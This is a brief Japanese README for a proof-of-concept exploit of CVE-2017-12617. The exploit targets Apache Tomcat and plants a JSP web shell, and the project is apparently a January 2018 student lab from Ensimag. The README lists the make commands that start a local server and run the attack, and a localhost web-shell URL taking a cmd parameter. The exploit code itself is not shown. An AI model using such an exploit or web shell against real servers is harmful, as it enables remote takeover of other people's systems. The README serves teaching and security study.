
概念実証 - RCEエクスプロイト : Apache Tomcat上のWeb Shell - Ensimag 2018年1月
このProof Of Conceptの目的は、CVE-2017-12617を利用してApache Tomcatサーバーをリモート制御する方法を示すことです。
make server_up
make attack
このコマンドでブラウザが開かない場合は、以下のURLにアクセスしてください:
http://localhost:8080/web_shell.jsp?cmd=pwd
これで、ブラウザ上でサーバーのWebシェルにアクセスできるようになります。
このProof of Conceptの実行に関して問題がある場合は、以下のリンクからIssueを作成してください:https://github.com/ygouzerh/CVE-2017-12617/issues 。できるだけ早く回答いたします。